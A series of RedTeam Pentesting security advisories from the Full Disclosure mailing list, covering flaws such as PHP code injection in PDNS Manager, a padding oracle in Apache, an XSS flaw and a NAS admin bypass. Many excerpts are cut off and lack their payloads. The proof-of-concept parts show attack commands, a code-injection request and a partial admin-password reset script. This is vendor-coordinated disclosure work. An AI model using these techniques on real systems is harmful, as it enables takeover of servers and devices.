RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager

2017-07-05 Thread RedTeam Pentesting GmbH

To bypass the problem that the addslashes() function prevents the usage
of single or double quotes for the GET variable name, it was instead
encoded with the chr() function and decodes to the string "cmd".

PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the
PHP PDO class for establishing a database connection. Since the PDO
class is quite liberal in what it accepts in its Data Source Name
parameter, the configuration parameters as shown above are accepted and
allow for a valid database connection, as the additional data in the
"port" parameter is ignored by the PDO class. Finally, the file
config/config-user.php will be written with the following content:


Proof of Concept

1. Check if install.php is still available and can be used to write a new
configuration by visiting the following URL:


2. Set up a database that PDNS Manager can connect to.

3. Send an HTTP POST request with a manipulated "port" parameter, e.g.

curl -H 'Content-Type: application/json' --data \
'{"host":"attacker-system.example.com", \
"user":"root", \
"password":"secret", \
"database":"pdnsdb", \
"port":"3306;system($_GET[chr(99).chr(109).chr(100)])", \
"userName":"administrator", \
"userPassword":"password", \
"type":"mysql"}' \

4. Run arbitrary commands:



Ensure that config/config-user.php exists.


The problem was fixed in the Git master branch in commit ccc4232[2].
Alternatively, the stable version v1.2.1 and earlier are not affected.

Security Risk

The vulnerability is deemed to be of medium risk. The number of
installations that are configured in the way described should be rather
low, as it is not the recommended way of installing PDNS Manager and the
development version of PDNS Manager needs to have been used. However, if
such a configuration is found, arbitrary PHP code can be run on the
system. Depending on the system's configuration, this can lead to a full
compromise of the host running PDNS Manager.


2017-05-16 Vulnerability identified
2017-06-16 Customer approved disclosure to vendor
2017-06-27 Vendor notified
2017-06-29 Vendor released fixed version
2017-07-05 Advisory released


[0] https://pdnsmanager.lmitsystems.de/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

2016-12-23 Thread RedTeam Pentesting GmbH

sys 0m0.976s

In this sample application, the username and a timestamp are included in
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":

$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
RU= username=admin

Encrypted session:


Sending this newly encrypted session to the server shows that the
username is now "admin":

$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\

your username is admin


Use a different means to store the session, e.g. in a database by using


Update to Apache HTTP version 2.4.25 (see [2]).

Security Risk

Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows to construct sessions with arbitrary
attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.


2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new released and inquired whether the
   patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released


[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler

2016-11-24 Thread RedTeam Pentesting GmbH
alicious LESS
file to the Less compiler. This vulnerability can be exploited in
various scenarios: If an application takes user-input and feeds it to
the Less compiler, an attacker can gain code execution and compromise
the system running the Less compiler. If a user downloads and compiles a
malicious LESS file, an attacker can compromise the user's system.

RedTeam Pentesting discovered and exploited this vulnerability in a
penetration test. However, it became increasingly clear after
consultation with the LESS development team that the encountered
situation is likely relatively rare. The reason for that is that LESS
files are usually compiled on the server-side once and most often do not
contain user-supplied content. In cases where LESS files do contain or
consist of user-supplied content, the browser-based implementation [3]
of the Less compiler is the typical choice.

Still, the official Less documentation does not mention the compiler's
feature to evaluate inline JavaScript and the consequential risks. Thus,
users are likely to be unaware that embedding user-controlled content
into a LESS file may result in arbitrary code execution. Therefore,
RedTeam Pentesting decided to release this advisory, to bring the users'
attention to this important fact.


2016-03-18 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-31 Customer approved disclosure to vendor
2016-06-24 Advisory sent to vendor
2016-07-05 Vendor debates whether it is a security issue or a
   documentation issue
2016-07-12 Vendor opts for waiting until release 3.0, which disables the
   option to compile JavaScript by default
2016-07-14 RedTeam downrates the vulnerability from high risk to low to
   acknowledge that it is more of a setup issue
2016-11-24 Still no release 3.0, advisory released


[0] https://github.com/less/less.js
[1] http://web.archive.org/web/20140202171923/http://www.lesscss.org/
[3] http://lesscss.org/#client-side-usage

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

2016-05-31 Thread RedTeam Pentesting GmbH

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':

$ curl --silent --include --data '' \

In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:

$ ls  relay-1-5-3/uploads/
stats_redteam.php.txt  temp_redteam.php

$ cat temp_redteam.php

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server e.g. in order to easily execute PHP
commands with the privileges of the web server.


One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.



Security Risk

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.


2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published


[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: Websockify: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.


Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"websockify was formerly named wsproxy and was part of the noVNC

At the most basic level, websockify just translates WebSockets traffic
to normal TCP socket traffic. Websockify accepts the WebSockets
handshake, parses it, and then begins forwarding traffic between the
client and the target in both directions."

(from the project's readme)

More Details

For each new connection, websockify forks and calls the function
do_handshake() to receive a client's WebSocket handshake. The
following excerpt shows some of the source code responsible for
receiving the client's data from the socket file descriptor:

ws_ctx_t *do_handshake(int sock) {
char handshake[4096], response[4096], sha1[29], trailer[17];
offset = 0;
for (i = 0; i < 10; i++) {
len = ws_recv(ws_ctx, handshake+offset, 4096);
if (len == 0) {
handler_emsg("Client closed during handshake\n");
return NULL;
offset += len;
handshake[offset] = 0;
if (strstr(handshake, "\r\n\r\n")) {

As can be seen in the listing, the function ws_recv() is called in a
loop to read data from the client's socket into the stack-allocated
buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096
bytes are read from the socket and stored in the handshake buffer.
The variable 'offset' determines the position in the buffer at which
the received data is written. In each iteration, the value of 'offset'
is increased by the amount of bytes received. If the received data
contains the string "\r\n\r\n", which marks the end of the WebSocket
handshake data, the loop is terminated. Otherwise, the loop is
terminated after a maximum of 10 iterations. The do_handshake()
function returns early if no more data can be received from the

By forcing websockify to iterate multiple times, attackers can
exploit this behaviour to write data past the space allocated for the
handshake buffer, thereby corrupting adjacent memory.

Proof of Concept

The following curl command can be used to trigger the buffer overflow:

$ curl http://example.com/$(python -c 'print "A"*5000')

Providing a generic exploit for this vulnerability is not feasible, as
it depends on the server side environment websockify is used in as well
as the used compiler and its flags. However, during a penetration test
it was possible to successfully exploit this buffer overflow
vulnerability and to execute arbitrary commands on the server.


Use the Python implementation of websockify.


The vulnerability has been fixed in commit 192ec6f [0].

Security Risk

Successful exploitation of the vulnerability allows attackers to execute
arbitrary code on the affected system. It is therefore rated as a high


2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachen   

[FD] [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor

Authenticated users who can create new HTTP XML/REST Value sensors in
PRTG Network Monitor can read local files on the PRTG host system via
XML external entity expansion.


Product: Paessler PRTG Network Monitor
Affected Versions:
Fixed Versions:
Vulnerability Type: XML External Entity Expansion
Security Risk: medium
Vendor URL: https://www.paessler.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-012
Advisory Status: published
CVE: CVE-2015-7743
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7743


"PRTG Network Monitor is the powerful and comprehensive network
monitoring solution from Paessler AG. It monitors your network using a
whole range of technologies and assures the availability of network
components and measures traffic and usage. PRTG saves costs by avoiding
outages, optimizing connections, saving time and controlling service
level agreements (SLAs)."

(from the vendor's website)[1]

More Details

An attacker with access to a PRTG Network Monitor account with
sufficient privileges to create or configure XML/REST sensors can read
files stored on the system's local disk. These sensors are intended to
query a URL and, depending on the configuration, check whether there is
a valid response or read the value of a specific XML node in the
document that is returned. This functionality is vulnerable to XML
external entity expansion.

Proof of Concept

In order to exploit this vulnerability an HTTP XML/REST Value sensor has
to be set up to access an attacker-controlled URL and to read the value
of a specific XML node, for example:


The XML document "xeee-hosts.xml" contains an external entity that uses
the "SYSTEM" keyword to load a local file as the content of the "hosts"


Since the XML parser of PRTG Network Monitor evaluates external
entities, the XML parser fetches the file


from the disk of the local system and inserts its content into the
"root" node of the XML document. If the sensor is configured to return
the value of that "root" node, the contents of that file are displayed
in the web interface of PRTG Network Monitor. This discloses the
contents of the file to attackers which otherwise would not be able to
read local files.


Update to a version greater or equal to (see [2]).

Security Risk

Attackers who can create new HTTP XML/REST sensors in PRTG Network
Monitor, are able to use the XML external entity expansion to read files
on the local system.  Depending on the data stored on the vulnerable
system, this vulnerability may pose a high risk. However, as attackers
are required to already have valid user credentials for the application,
the vulnerability is only rated to have a medium risk potential.


2015-08-28 Vulnerability identified in PRTG Network Monitor
2015-09-04 Customer approved disclosure of vulnerability
2015-09-04 CVE ID requested
2015-09-24 CVE ID requested again
2015-10-07 CVE ID assigned
2015-10-21 Vendor contacted
2016-04-04 Vendor released fixed version
2016-05-31 Advisory released


[1] https://www.paessler.com
[2] https://www.paessler.com/prtg/history/stable

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2

2016-03-22 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Securimage 3.6.2

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Securimage CAPTCHA software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.


Product: Securimage
Affected Versions: >= 3.2RC1
Fixed Versions: 3.6.4
Vulnerability Type: Cross-site Scripting
Security Risk: high
Vendor URL: https://www.phpcaptcha.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-002
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"Securimage is an open-source free PHP CAPTCHA script for generating
complex images and CAPTCHA codes to protect forms from spam and abuse.
It can be easily added into existing forms on your website to provide
protection from spam bots. It can run on most any web server as long as
you have PHP installed, and GD support within PHP. Securimage does
everything from generating the CAPTCHA images to validating the typed
code. Audible codes can be streamed to the browser with Flash for the
vision impaired."

(from the project's homepage)

More Details

The Securimage download package and GitHub repository include several
example scripts to demonstrate the usage of the library. Among these
scripts is the file example_form.ajax.php. It returns JavaScript code
that includes an unencoded value from the variable $_SERVER['PHP_SELF']
directly embedded into the website.

In Securimage versions from 3.2RC1 to 3.5 the following code is

function processForm()
new Ajax.Request('', {
method: 'post',
parameters: $('contact_form').serialize(),
onSuccess: function(transport) {

In Securimage versions from 3.5.2 to 3.6.2 the following code is

function processForm()
url: '',
type: 'POST',
data: jQuery('#contact_form').serialize(),
dataType: 'json',
}).done(function(data) {

The problem here is that the value of the variable $_SERVER['PHP_SELF']
can, depending on the configuration of the web server, often be
manipulated by an attacker to include special characters like

Proof of Concept

The following URL can be used to demonstrate the vulnerability for
Securimage versions from 3.2RC1 to 3.5 on with a vulnerable web server


Securimage versions from 3.5.2 to 3.6.2 can be exploited with the
following URL:


The result is a notification showing the text "RedTeam Pentesting". The
value of the variable $_SERVER['PHP_SELF'] is embedded in verbatim into
the HTML source code of the resulting web page.


The file example_form.ajax.php should be deleted from the Securimage
directory on a web server.


Update to version 3.6.4.

Security Risk

This security vulnerability is rated as a high risk. It allows executing
arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many possibilities for further
attacks against these users. Since Securimage is usually used as a
software library to provide CAPTCHA functionality for web applications,
the vulnerability could be used to exploit all web applications hosted
on the same domain.


2016-02-03 Vulnerability identified
2016-02-12 Customer approved disclosure to vendor
2016-02-23 CVE number requested
2016-02-24 CVE number not assigned, "non-prioritized product"
2016-03-02 Vendor contacted
2016-03-03 Vendor releases fixed version
2016-03-22 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH















[msg24] CPE -> ACS B:




[msg25] CPE <- ACS B:



o2 implemented countermeasures that prevent attackers from spoofing a
victim's IP address in CWMP messages. This prevents attackers from
retrieving arbitrary o2 customers' VoIP credentials.


The CPE needs to be properly authenticated when communicating with the
ACS. One option of doing so would be to provide the password of the DSL
connection. This password is already known to the CPE as it has been
entered manually by the customer during the initial setup process.

Security Risk

This vulnerability allows the unauthorised usage of foreign VoIP
telephone numbers. The victim will be charged with all costs resulting
from fraudulent phone calls. Furthermore, an attacker may answer phone
calls on behalf of the victim. Customers have no means of defending
oneself from such an attack. Chances are that the attack will be
noticed only by customers who regularly check their invoice. The
vulnerability is therefore considered to pose a high risk.


2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the
 problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,
2016-01-08 - Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH
-14 CVE number assigned
2014-11-17 Vendor provided fixed version to RedTeam Pentesting
2015-07-16 Vendor started releasing fixed versions (7490 [0])
2015-10-01 Vendor finished releasing fixed versions (other models)
2016-01-07 Advisory released


[0] https://avm.de/service/sicherheitshinweise/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality

2015-12-22 Thread RedTeam Pentesting GmbH
ure, the web
application did not assign a new value to the PHPSESSID cookie. If an
attacker somehow got in possession of the cookie's value or has
successfully set a given cookie value in the user's browser at some
point in the past, the attacker is now able to access the web
application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' \
-b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000


In hac habitasse platea dictumst
8/23/15, 10:16 AM


Disable the "Remember Me" login functionality within the configuration
file security.yml.


Upgrade to a fixed version if possible, otherwise refer to section

Security Risk

The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker either got access to the PHPSESSID cookie
value or has successfully set a new value in the user's browser. Because
of its requirements, the described vulnerability poses a low risk only.
The risk estimation may be increased to medium or high based on the
affected web application and the accessible data.


2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released


[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-006] Buffalo LinkStation Authentication Bypass

2015-10-08 Thread RedTeam Pentesting GmbH
rn False
if r.status_code != 200:
sys.stdout.write("bad reply.\n")
return False
reply = json.loads(r.text)
sid = reply['data'][0]['sid']
sys.stdout.write("error while parsing reply.")
return False
#do not check success key of JSON reply here.
#it will most likely be false (user/password wrong)!
return sid

def set_admin_password(url, sid, password):
headers = {'User-Agent': None}
payload = {'bufaction': 'setUserSettingsadmin', 'userName': 'admin',
'userId': '52', 'userDesc': 'Built-in account for ' +
'administering the system', 'pwd': args.password, 'confPwd':
args.password, 'primGroup': 'admin', 'quota_soft': '',
'quota_hard': ''}
cookies = {'webui_session_RedTeam': '%s_en_0' % sid}
sys.stdout.write("Trying to set admin password to %s... " %
r = requests.post(url, headers=headers, cookies=cookies,
data=payload, verify=False)
sys.stdout.write("could not connect to target.\n")
return False
if r.status_code != 200:
sys.stdout.write("bad reply.\n")
return False
reply = json.loads(r.text)
success = reply['success']
sys.stdout.write("error while parsing reply.\n")
return False
if success == True:
return success

url = "https://%s:%s/dynamic.pl"; % (args.host, args.port)
sid = get_session_id(url)
if sid == False:

if set_admin_password(url, sid, args.password) == True:
sys.stdout.write("Admin password successfully set!\n")
sys.stdout.write("URL: https://%s:%s/\n"; % (args.host, args.port))
sys.stdout.write("New credentials: admin : %s\n" % args.password)


If possible, disable access to the web interface, for example via an ACL
in the responsible ethernet switch.


Users should install firmware version 1.71 or higher to ensure proper
server-side authentication. In addition, a password should be set for
the "guest" user account, which is by default present and enabled, but
does not have a password.

Security Risk

This vulnerability allows an unauthenticated attacker to gain administrative
privileges on a Buffalo LinkStation. All attached storage devices may then be
accessed by the attacker. This puts the available data at risk as confidential
information may be disclosed, valuable information destroyed or manipulated.
Depending on the firmware of the device, an attacker may also be able execute
malicious code on the LinkStation either via installing a customized firmware
image[0] or by exploiting a publicly disclosed remote command injection

It is therefore estimated that the vulnerability poses a high risk to
anyone who uses an affected device.


2015-03-30 Vulnerability identified
2015-04-09 Customer approved disclosure to vendor
2015-06-09 Vendor notified
2015-06-09 Vendor responds: vulnerability is fixed in version 1.70
2015-06-09 Verified that vulnerability is not fixed in version 1.70
2015-06-09 Vendor responded: vulnerability is already known and being
   worked on, release date is not known
2015-06-09 Vendor provided list of affected devices
2015-07-10 Vendor queried for update, no response
2015-08-03 Vendor queried for update (by phone)
2015-08-04 Vendor responded: advisory has been forwarded to development.
2015-08-04 Vendor queried for estimated fix
2015-08-13 Vendor announced fixed version 1.71
2015-09-04 CVE ID requested
2015-09-07 RedTeam verified that the vulnerability has been fixed
2015-10-07 CVE ID not assigned, may be "duplicate finding"
2015-10-08 Advisory published


[0] http://buffalo.nas-central.org/wiki/Category:LS-WXL
[1] https://www.andreafabrizi.it/?exploits:terastation

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security

[FD] [RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager

2015-06-15 Thread RedTeam Pentesting GmbH
Advisory: SQL Injection in TYPO3 Extension Akronymmanager

An SQL injection vulnerability in the TYPO3 extension "Akronymmanager"
allows authenticated attackers to inject SQL statements and thereby read
data from the TYPO3 database.


Product: sb_akronymmanager
Affected Versions: <=0.5.0
Fixed Versions: 7.0.0
Vulnerability Type: SQL Injection
Security Risk: medium
Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
Advisory Status: published 
CVE: CVE-2015-2803
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803


"The Acronym Manager adds special explanatory markup to acronyms, abbreviations
and foreign words on the whole site following the requirement to accessible web

It provides a backend module to administer a list of words to generate new HTML
elements for explanatory markup."

(from the extension's documentation)

More Details

Users with the respective privileges can maintain acronyms through the
Akronymmanager extension pages in the TYPO3 backend web interface.

In the extension's file mod1/index.php, an SQL query is generated like
follows (line 357 and following):

$pageID = t3lib_div::_GET("id");
if ($pageID) $where = "uid='$pageID' AND ";
$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages',
$where.'hidden="0" AND deleted="0"','sorting');

The value of the user-supplied HTTP GET parameter 'id' is used without
sanitizing it before its use in the subsequent SQL statement. Therefore,
attackers are able to manipulate the resulting SQL statement and inject
their own queries into the statement.

Proof of Concept

When requesting the following URL, the vulnerability is exploited to yield all
usernames and hashes from the TYPO3 be_users database:


The login credentials are then embedded in the HTML page that is



Only give trusted users access to the Akronymmanager extension in the
TYPO3 backend.


Upgrade the extension to version 7.0.0.

Security Risk

An attacker who has access to the backend part of the Akronymmanager
extension may send SQL queries to the database. This can be used to read
arbitrary tables of the TYPO3 database and may ultimately result in a
privilege escalation if the TYPO3 users' password hashes can be cracked
efficiently. Depending on the database configuration, it might also be
possible to execute arbitrary commands on the database host.  As the
attack requires an attacker who already has backend access, the
vulnerability is estimated to pose only a medium risk.


2015-02-25 Vulnerability identified
2015-03-04 Customer approved disclosure to vendor
2015-03-10 CVE number requested
2015-03-10 Vendor notified
2015-03-26 CVE number requested again
2015-03-31 CVE number assigned (request #2)
2015-03-31 Vendor notified again
2015-03-31 Vendor responded
2015-04-08 Vendor announced fixed version available at the end of April
2015-05-13 Requested update from vendor
2015-05-15 Vendor requests more time
2015-05-21 Requested update from vendor
2015-05-22 Vendor states that upload to extension registry doesn't work
2015-06-03 Requested update from vendor
2015-06-10 Vendor uploads new version to extension registry
2015-06-15 Advisory published

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

